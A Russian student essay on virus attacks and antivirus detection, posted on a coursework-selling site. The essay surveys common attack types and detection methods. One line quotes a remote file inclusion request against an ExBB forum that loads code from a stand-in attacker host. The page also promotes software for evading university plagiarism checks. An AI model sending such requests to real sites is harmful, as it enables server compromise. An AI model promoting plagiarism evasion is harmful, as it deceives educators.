На бирже курсовых и дипломных проектов можно найти образцы готовых работ или получить помощь в написании уникальных курсовых работ, дипломов, лабораторных работ, контрольных работ, диссертаций, рефератов. Так же вы мажете самостоятельно повысить уникальность своей работы для прохождения проверки на плагиат всего за несколько минут.

ЛИЧНЫЙ КАБИНЕТ 

 

Здравствуйте гость!

 

Логин:

Пароль:

 

Запомнить

 

 

Забыли пароль? Регистрация

Повышение уникальности

Предлагаем нашим посетителям воспользоваться бесплатным программным обеспечением «StudentHelp», которое позволит вам всего за несколько минут, выполнить повышение уникальности любого файла в формате MS Word. После такого повышения уникальности, ваша работа легко пройдете проверку в системах антиплагиат вуз, antiplagiat.ru, etxt.ru или advego.ru. Программа «StudentHelp» работает по уникальной технологии и при повышении уникальности не вставляет в текст скрытых символов, и даже если препод скопирует текст в блокнот – не увидит ни каких отличий от текста в Word файле.

Результат поиска


Наименование:


реферат Вирусы и вирусные атаки

Информация:

Тип работы: реферат. Добавлен: 17.08.2012. Сдан: 2011. Страниц: 6. Уникальность по antiplagiat.ru: < 30%

Описание (план):


Содержание:
Введение
    Вирусные атаки и их виды.
    Средства обнаружения вирусных атак.
Заключение 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Введение
     Вирусная атака - это покушение на удалённую/локальную вычислительную систему с использованием вредоносных программ (вирусов).
     Вирусные  атаки представляет собой более изощрённый метод получения доступа к закрытой информации, так как хакеры используют специальные программы для ведения работы на компьютере жертвы, а также дальнейшего распространения (это вирусы и черви). Такие программы предназначены для поиска и передачи своему владельцу секретной информации, либо просто для нанесения вреда системе безопасности и работоспособности компьютера жертвы. Принципы действия этих программ различны.
     На  данный момент вирусные атаки представляют серьезную угрозу для простых  пользователей, не говоря уже и о  крупных предприятиях, информация которых  может иметь огромную ценность. Именно по этой причине организация и проведение вирусных атак представляет из себя целую индустрию, в которой заинтересованы не только злоумышленники (сетевые преступники), но и производители антивирусного ПО.
     Мы, как простые пользователи ПК, должны знать, как защититься от вирусных атак, как не стать ее случайными участниками, а для этого нужно знать  – что же такое вирусная атака, способы и методы их применения. 
 
 
 
 
 
 
 
 

    Вирусные атаки и их виды.
 
     Вирусная атака - действие, целью которого является захват контроля (повышение прав) над удалённой/локальной вычислительной системой, либо её дестабилизация, либо отказ в обслуживании. 

      Mailbombing
     Считается самым старым методом атак, хотя суть его проста и примитивна: большое  количество почтовых сообщений делают невозможными работу с почтовыми  ящиками, а иногда и с целыми почтовыми  серверами. Для этой цели было разработано  множество программ, и даже неопытный  пользователь мог совершить атаку, указав всего лишь e-mail жертвы, текст сообщения, и количество необходимых сообщений. Многие такие программы позволяли прятать реальный IP-адрес отправителя, используя для рассылки анонимный почтовый сервер. Эту атаку сложно предотвратить, так как даже почтовые фильтры провайдеров не могут определить реального отправителя спама. Провайдер может ограничить количество писем от одного отправителя, но адрес отправителя и тема зачастую генерируются случайным образом. 

      Переполнение  буфера
     Пожалуй, один из самых распространенных типов  атак в Интернете. Принцип данной атаки построен на использовании  программных ошибок, позволяющих  вызвать нарушение границ памяти и аварийно завершить приложение или выполнить произвольный бинарный код от имени пользователя, под которым работала уязвимая программа. Если программа работает под учётной записью администратора системы, то данная атака позволит получить полный контроль над компьютером жертвы, поэтому рекомендуется работать под учётной записью рядового пользователя, имеющего ограниченные права на системе, а под учётной записью администратора системы выполнять только операции, требующие административные права. 

      Сетевая разведка
     В ходе такой атаки собственно не производится никаких деструктивных действий, но в результате он может получить закрытую информацию о построении и принципах функционирования вычислительной системы жертвы. Полученная информация может быть использована для грамотного построения предстоящей атаки, и обычно производится на подготовительных этапах.
     В ходе такой разведки злоумышленник  может производить сканирование портов, запросы DNS, эхо-тестирование открытых портов, наличие и защищённость прокси-серверов. В результате можно получить информацию о существующих в системе DNS-адресах, кому они принадлежат, какие сервисы на них доступны, уровень доступа к этим сервисам для внешних и внутренних пользователей. 

      Сниффинг пакетов
     Также довольно распространённый вид атаки, основанный на работе сетевой карты  в режиме promiscuous mode, а также monitor mode для сетей Wi-Fi. В таком режиме все пакеты, полученные сетевой картой, пересылаются на обработку специальному приложению, называемым сниффером, для обработки. В результате злоумышленник может получить большое количество служебной информации: кто, откуда и куда передавал пакеты, через какие адреса эти пакеты проходили. Самой большой опасностью такой атаки является получение самой информации, например логинов и паролей сотрудников, которые можно использовать для незаконного проникновения в систему под видом обычного сотрудника компании. 

      IP-спуфинг
     Тоже  распространённый вид атаки в  недостаточно защищённых сетях, когда  злоумышленник выдаёт себя за санкционированного пользователя, находясь в самой организации, или за её пределами. Для этого  крэкеру необходимо воспользоваться IP-адресом, разрешённым в системе безопасности сети. Такая атака возможна, если система безопасности позволяет идентификацию пользователя только по IP-адресу и не требует дополнительных подтверждений. 

      Man-in-the-Middle
     Вид атаки, когда злоумышленник перехватывает  канал связи между двумя системами, и получает доступ ко всей передаваемой информации. При получении доступа  на таком уровне злоумышленник может  модифицировать информацию нужным ему  образом, чтобы достичь своих  целей. Цель такой атаки — кража  или фальсифицирование передаваемой информации, или же получение доступа  к ресурсам сети. Такие атаки крайне сложно отследить, так как обычно злоумышленник находится внутри организации. 

      Инъекция
     Атака, связанная с различного рода инъекциями, подразумевает внедрение сторонних  команд или данных в работающую систему  с целью изменения хода работы системы, а в результате — получение  доступа к закрытым функциям и  информации, либо дестабилизации работы системы в целом. Наиболее популярна  такая атака в сети Интернет, но также может быть проведена через  командную строку системы.
     SQL-инъекция  — атака, в ходе которой  изменяются параметры SQL-запросов  к базе данных. В результате  запрос приобретает совершенно  иной смысл, и в случае недостаточной  фильтрации входных данных способен  не только произвести вывод  конфиденциальной информации, но  и изменить/удалить данные. Очень  часто такой вид атаки можно  наблюдать на примере сайтов, которые используют параметры командной строки (в данном случае — переменные URL) для построения SQL-запросов к базам данных без соответствующей проверки.
     Вместо  проверки можно подставить утверждение, которое будучи истинным позволит обойти проверку 

     PHP-инъекция  — один из способов взлома  веб-сайтов, работающих на PHP. Он заключается  в том, чтобы внедрить специально  сформированный злонамеренный сценарий  в код веб-приложения на серверной  стороне сайта, что приводит  к выполнению произвольных команд. Известно, что во многих распространённых  в интернете бесплатных движках  и форумах, работающих на PHP (чаще  всего это устаревшие версии) есть непродуманные модули или  отдельные конструкции с уязвимостями. Крэкеры анализируют такие уязвимости, как неэкранированные переменные, получающие внешние значения, например старая уязвимость форума ExBB используется хакерами запросом:
     GET //modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt????? .
     Межсайтовый скриптинг или XSS (аббр. от англ.  Cross Site Scripting) — тип уязвимостей, обычно обнаруживаемых в веб-приложениях, которые позволяют внедрять код злонамеренным пользователям в веб-страницы, просматриваемые другими пользователями. Примерами такого кода являются HTML-код и скрипты, выполняющиеся на стороне клиента, чаще всего JavaScript. Другие названия: CSS, реже — скрипт-инъекция.
     XPath-инъекция - вид уязвимостей, который заключается во внедрении XPath-выражений в оригинальный запрос к базе данных XML. Как и при остальных видах инъекций, уязвимость возможна ввиду недостаточной проверки входных данных. 

      Отказ в обслуживании
     DoS (от англ. Denial of Service — Отказ в обслуживании) — атака, имеющая своей целью заставить сервер не отвечать на запросы. Такой вид атаки не подразумевает получение некоторой секретной информации, но иногда бывает подспорьем в инициализации других атак. Например, некоторые программы из-за ошибок в своём коде могут вызывать исключительные ситуации, и при отключении сервисов способны исполнять код, предоставленный злоумышленником или атаки лавинного типа, когда сервер не может обработать огромное количество входящих пакетов.
     DDoS (от англ. Distributed Denial of Service — Распределенная DoS) — подтип DoS атаки, имеющий ту же цель что и DoS, но производимой не с одного компьютера, а с нескольких компьютеров в сети. В данных типах атак используется либо возникновение ошибок, приводящих к отказу сервиса, либо срабатывание защиты, приводящей к блокированию работы сервиса, а в результате также к отказу в обслуживании. DDoS используется там, где обычный DoS неэффективен. Для этого несколько компьютеров объединяются, и каждый производит DoS атаку на систему жертвы. Вместе это называется DDoS-атака.
     Любая атака представляет собой не что  иное, как попытку использовать несовершенство системы безопасности жертвы либо для  получения информации, либо для нанесения  вреда системе, поэтому причиной любой удачной атаки является профессионализм крэкера и ценность информации, а также недостаточная компетенция администратора системы безопасности в частности, несовершенство программного обеспечения и недостаточное внимание к вопросам безопасности в компании в целом. 
 
 
 

    Средства  обнаружения вирусных атак.
 
     На  данный момент антивирусное программное  обеспечение разрабатывается в  основном для ОС семейства Windows от компании Microsoft, что вызвано большим количеством вредоносных программ именно под эту платформу (а это, в свою очередь, вызвано большой популярностью этой ОС, также как и большим количеством средств разработки, в том числе бесплатных и даже «инструкций по написанию вирусов»). В настоящий момент на рынок выходят продукты и под другие платформы настольных компьютеров, такие как Linux и Mac OS X. Это вызвано началом распространения вредоносных программ и под эти платформы, хотя UNIX-подобные системы всегда славились своей надежностью. Например, известное видео «Mac or PC» шуточно показывает преимущество Mac OS над Windows и большим антивирусным иммунитетом Mac OS по сравнению с Windows. 

     Помимо  ОС для настольных компьютеров и  ноутбуков, также существуют платформы  и для мобильных устройств, такие  как Windows Mobile, Symbian, iOS, BlackBerry, Android, Windows Phone 7 и др. Пользователи устройств на данных ОС также подвержены риску заражения вредоносным программным обеспечением, поэтому некоторые разработчики антивирусных программ выпускают продукты и для таких устройств. 

Классификация антивирусных продуктов
     Классифицировать  антивирусные продукты можно сразу  по нескольким признакам, таким как: используемые технологии антивирусной защиты, функционал продуктов, целевые  платформы. 
 
 

     По  используемым технологиям  антивирусной защиты:
    Классические антивирусные продукты (продукты, применяющие только сигнатурный метод детектирования)
    Продукты проактивной антивирусной защиты (продукты, применяющие только проактивные технологии антивирусной защиты);
    Комбинированные продукты (продукты, применяющие как классические, сигнатурные методы защиты, так и проактивные)
 
     По  функционалу продуктов:
    Антивирусные продукты (продукты, обеспечивающие только антивирусную защиту)
    Комбинированные продукты (продукты, обеспечивающие не только защиту от вредоносных программ, но и фильтрацию спама, шифрование и резервное копирование данных и другие функции)
 
     Эффективность системы обнаружения атак во многом зависит от применяемых методов  анализа полученной информации. В  первых системах обнаружения атак, разработанных в начале 1980-х годов, использовались статистические методы обнаружения атак. В настоящее  время к статистическому анализу  добавился ряд новых методик, начиная с экспертных систем и  нечёткой логики и заканчивая использованием нейронных сетей. 

     
    Статистический  метод
     Основные  преимущества статистического подхода  — использование уже разработанного и зарекомендовавшего себя аппарата математической статистики и адаптация  к поведению субъекта.
     Сначала для всех субъектов анализируемой  системы определяются профили. Любое  отклонение используемого профиля  от эталонного считается несанкционированной деятельностью. Статистические методы универсальны, поскольку для проведения анализа не требуется знания о возможных атаках и используемых ими уязвимостях. Однако при использовании этих методик возникают и проблемы:
      «статистические» системы не чувствительны к порядку следования событий; в некоторых случаях одни и те же события в зависимости от порядка их следования могут характеризовать аномальную или нормальную деятельность;
      трудно задать граничные (пороговые) значения отслеживаемых системой обнаружения атак характеристик, чтобы адекватно идентифицировать аномальную деятельность;
      «статистические» системы могут быть с течением времени «обучены» нарушителями так, чтобы атакующие действия рассматривались как нормальные.
     Следует также учитывать, что статистические методы не применимы в тех случаях, когда для пользователя отсутствует  шаблон типичного поведения или  когда для пользователя типичны  несанкционированные действия. 

     
    Экспертные  системы
     Экспертные  системы состоят из набора правил, которые охватывают знания человека-эксперта. Использование экспертных систем представляет собой распространенный метод обнаружения  атак, при котором информация об атаках формулируется в виде правил. Эти правила могут быть записаны, например, в виде последовательности действий или в виде сигнатуры. При  выполнении любого из этих правил принимается  решение о наличии несанкционированной  деятельности. Важным достоинством такого подхода является практически полное отсутствие ложных тревог.
     БД  экспертной системы должна содержать  сценарии большинства известных  на сегодняшний день атак. Для того чтобы оставаться постоянно актуальными, экспертные системы требуют постоянного  обновления БД. Хотя экспертные системы предлагают хорошую возможность для просмотра данных в журналах регистрации, требуемые обновления могут либо игнорироваться, либо выполняться администратором вручную. Как минимум, это приводит к экспертной системе с ослабленными возможностями. В худшем случае отсутствие надлежащего сопровождения снижает степень защищенности всей сети, вводя ее пользователей в заблуждение относительно действительного уровня защищенности.
     Основным  недостатком является невозможность  отражения неизвестных атак. При  этом даже небольшое изменение уже  известной атаки может стать  серьезным препятствием для функционирования системы обнаружения атак. 

     
    Нейронные сети
     Большинство современных методов обнаружения  атак используют некоторую форму  анализа контролируемого пространства на основе правил или статистического  подхода. В качестве контролируемого  пространства могут выступать журналы  регистрации или сетевой трафик. Анализ опирается на набор заранее  определённых правил, которые создаются  администратором или самой системой обнаружения атак.
     Любое разделение атаки во времени или  среди нескольких злоумышленников  является трудным для обнаружения  при помощи экспертных систем. Из-за большого разнообразия атак и хакеров  даже специальные постоянные обновления БД правил экспертной системы никогда  не дадут гарантии точной идентификации  всего диапазона атак.
     Использование нейронных сетей является одним  из способов преодоления указанных  проблем экспертных систем. В отличие  от экспертных систем, которые могут  дать пользователю определённый ответ  о соответствии рассматриваемых  характеристик заложенным в БД правилам, нейронная сеть проводит анализ информации и предоставляет возможность  оценить, согласуются ли данные с  характеристиками, которые она научена  распознавать. В то время как степень соответствия нейросетевого представления может достигать 100 %, достоверность выбора полностью зависит от качества системы в анализе примеров поставленной задачи.
     Сначала нейросеть обучают правильной идентификации на предварительно подобранной выборке примеров предметной области. Реакция нейросети анализируется и система настраивается таким образом, чтобы достичь удовлетворительных результатов. В дополнение к начальному периоду обучения, нейросеть набирается опыта с течением времени, по мере того, как она проводит анализ данных, связанных с предметной областью.
     Важным  преимуществом нейронных сетей  при обнаружении злоупотреблений  является их способность «изучать»  характеристики умышленных атак и идентифицировать элементы, которые не похожи на те, что  наблюдались в сети прежде.
     Каждый  из описанных методов обладает рядом  достоинств и недостатков, поэтому  сейчас практически трудно встретить  систему, реализующую только один из описанных методов. Как правило, эти методы используются в совокупности. 

Обнаружение, основанное на сигнатурах
     Обнаружение, основанное на сигнатурах — метод  работы антивирусов и систем обнаружения  вторжений, при котором программа, просматривая файл или пакет, обращается к словарю с известными вирусами, составленному авторами программы. В случае соответствия какого-либо участка кода просматриваемой программы  известному коду (сигнатуре) вируса в  словаре, программа антивирус может  заняться выполнением одного из следующих  действий:
      Удалить инфицированный файл.
      Отправить файл в «карантин» (то есть сделать его недоступным для выполнения, с целью недопущения дальнейшего распространения вируса).
      Попытаться восстановить файл, удалив сам вирус из тела файла.
     Для достижения достаточно продолжительного успеха, при использовании этого  метода необходимо периодически пополнять  словарь известных вирусов новыми определениями (в основном в онлайновом режиме). Обладающие чувством гражданского долга и технически искушённые пользователи, обнаружив «живьём» новый вирус, могут выслать заражённый файл разработчикам  антивирусных программ, которые включат  затем новый вирус в словарь.
     Антивирусные  программы, созданные на основе метода соответствия определению вирусов  в словаре, обычно просматривают  файлы тогда, когда компьютерная система создаёт, открывает, закрывает  или посылает файлы по электронной  почте. Таким образом, вирусы можно  обнаружить сразу же после занесения  их в компьютер и до того, как  они смогут причинить какой-либо вред. Надо отметить, что системный  администратор может составить  график для антивирусной программы, согласно которому могут просматриваться (сканироваться) все файлы на жёстком  диске.
     Хотя  антивирусные программы, созданные  на основе поиска соответствия определению вируса в словаре, при обычных обстоятельствах, могут достаточно эффективно препятствовать вспышкам заражения компьютеров, авторы вирусов стараются держаться на полшага впереди таких программ-антивирусов, создавая «олигоморфические», «полиморфические» и, самые новые, «метаморфические» вирусы, в которых некоторые части участки кода перезаписываютсся, модифицируются, шифруются или искажаются так, чтобы невозможно было обнаружить совпадение с определением в словаре вирусов.
     Доступно  одно описание одного из методов аппаратного  сканирования по ссылке. Оно заключается  в попутном сканировании потока данных специальным устройством под  названием контекстный сопроцессор. 
 

Создание  и распределение  сигнатур
     Сигнатуры антивирусов создаются в результате кропотливого анализа нескольких копий  файла, принадлежащего одному вирусу. Сигнатура должна содержать только уникальные строки из этого файла, настолько  характерные, чтобы гарантировать  минимальную возможность ложного  срабатывания — главный приоритет  любой антивирусной компании.
     Разработка  сигнатур — ручной процесс, тяжело поддающийся автоматизации. Несмотря на массу исследований, посвящённых  автоматической генерации сигнатур, нарастающий полиморфизм (и «метаморфизм») вирусов и атак делают синтактические сигнатуры бессмысленными. Антивирусные компании вынуждены выпускать большое  количество сигнатур для всех вариантов  одного и того же вируса, и если бы не закон Мура, ни один современный  компьютер уже не смог бы закончить  сканирование большого числа файлов с такой массой сигнатур в разумное время.
     В нынешнем виде, базы сигнатур должны пополняться  регулярно, так как большинство  антивирусов не в состоянии обнаруживать новые вирусы самостоятельно. Любой владелец ПО, основанного на сигнатурах, обречён на регулярную зависимость от обновления сигнатур, что составляет основу бизнес-модели производителей антивирусов и СОВ.
     Своевременная доставка новых сигнатур до пользователей  также является серьёзной проблемой  для производителей ПО. Современные вирусы и черви распространяются с такой скоростью, что к моменту выпуска сигнатуры и доставки её на компьютер пользователей, эпидемия уже может достигнуть своей высшей точки и охватить весь мир. По опубликованным данным, доставка сигнатуры занимает от 11 до 97 часов в зависимости от производителя, в то время как теоретически, вирус может захватить весь интернет меньше, чем за 30 секунд.
     В большинстве ПО по безопасности база сигнатур является ядром продукта, наиболее трудоёмкой и ценной частью. Именно поэтому большинство вендоров предпочитает держать свои сигнатуры закрытыми — хотя и в этой области существует ряд открытого ПО (напр., ClamAV), а также исследования по обратной разработке закрытых сигнатур. Virus Bulletin регулярно публиковал сигнатуры новых вирусов вплоть до 2000 года.
     Проблемы  разработки сигнатур и слабого распределения  некоторых представителей вредоносного ПО приводят к тому, что разработанные в разных антивирусных компаниях сигнатуры содержат определения для разных подмножеств вирусов. Эту проблему можно устранить, разработав международный стандарт на описание антивирусных сигнатур, который будет содержать необходимую информацию для обнаружения, идентификации и устранения вредоносного ПО. Максимальный эффект от такого стандарта можно получить при реализации централизованной базы знаний по вредоносному ПО, в которую все антивирусные компании будут иметь право записи новых сигнатур (или изменение существующих). Но в таком централизованном хранилище (базе данных) каждая запись должна иметь цифровую подпись автора (конкретной компании), которая будет защищать конечных пользователей от атаки на локальную базу сигнатур путем отравления её содержимого. Так же при добавлении новых записей в центральное хранилище сигнатур должен изменяться рейтинг фирм производителей. Этот рейтинг сделает фирмы заинтересованными, так как их работу пользователь может напрямую оценивать. 

Недостатки  и достоинства  синтаксических сигнатур
      Позволяют определять конкретную атаку с высокой точностью и малой долей ложных вызовов
      Неспособны выявить какие-либо новые атаки
      Беззащитны перед полиморфными вирусами и изменёнными версиями того же вируса
      Требуют регулярного и крайне оперативного обновления
      Требуют кропотливого ручного анализа вирусов
     Метод эвристического сканирования призван  улучшить способность сканеров применять  сигнатуры и распознавать модифицированные вирусы в тех случаях, когда сигнатура  совпадает с телом неизвестной программы не на 100%. Данная технология, однако, применяется в современных программах очень осторожно, так как может повысить количество ложных срабатываний. 

Проактивная защита
     Проактивные технологии – совокупность технологий и методов, используемых в антивирусном программном обеспечении, основной целью которых, в отличие от реактивных (сигнатурных) технологий, является предотвращение заражения системы пользователя, а не поиск уже известного вредоносного программного обеспечения в системе.
      
История развития проактивных технологий антивирусной защиты

     Проактивные технологии начали развиваться практически одновременно с классическими (сигнатурными) технологиями. Однако, первые реализации проактивных технологий антивирусной защиты требовали высокий уровень квалификации пользователя, т.е. не были рассчитаны на массовое использование простыми пользователями персональных компьютеров. Спустя десятилетие антивирусной индустрии стало очевидно, что сигнатурные методы обнаружения уже не могут обеспечить эффективную защиту пользователей. Этот факт и подтолкнул к возрождению проактивных технологий. 
 
 
 
 
 
 

     Технологии  проактивной защиты: 

    Эвристический анализ
     Технология  эвристического анализа позволяет  на основе анализа кода выполняемого приложения, скрипта или макроса  обнаружить участки кода, отвечающие за вредоносную активность.
     Эффективность данной технологии не является высокой, что обусловлено большим количеством  ложных срабатываний при повышении  чувствительности анализатора, а также  большим набором техник, используемых авторами вредоносного ПО для обхода эвристического компонента антивирусного ПО. 

    Эмуляция  кода
     Технология  эмуляции позволяет запускать приложение в среде эмуляции, эмулируя поведение  ОС или центрального процессора. При  выполнении приложения в режиме эмуляции приложение не сможет нанести вреда  системе пользователя, а вредоносное  действие будет детектировано эмулятором.
     Несмотря  на кажущуюся эффективность данного  подхода, он также не лишен недостатков  – эмуляция занимает слишком много  времени и ресурсов компьютера пользователя, что негативно сказывается на быстродействии при выполнении повседневных операций, также, современные вредоносные  программы способны обнаруживать выполнение в эмулированной среде и прекращать свое выполнение в ней. 

    Анализ  поведения
     Технология  анализа поведения основывается на перехвате всех важных системных  функций или установке т.н. мини-фильтров, что позволяет отслеживать всю  активность в системе пользователя. Технология поведенческого анализа  позволяет оценивать не только единичное  действие, но и цепочку действий, что многократно повышает эффективность противодействия вирусным угрозам. Также, поведенческий анализ является технологической основой для целого класса программ – поведенческих блокираторов (HIPS – Host-based Intrusion Systems).
и т.д.................


Перейти к полному тексту работы


Скачать работу с онлайн повышением уникальности до 90% по antiplagiat.ru, etxt.ru или advego.ru


Смотреть полный текст работы бесплатно


Смотреть похожие работы


* Примечание. Уникальность работы указана на дату публикации, текущее значение может отличаться от указанного.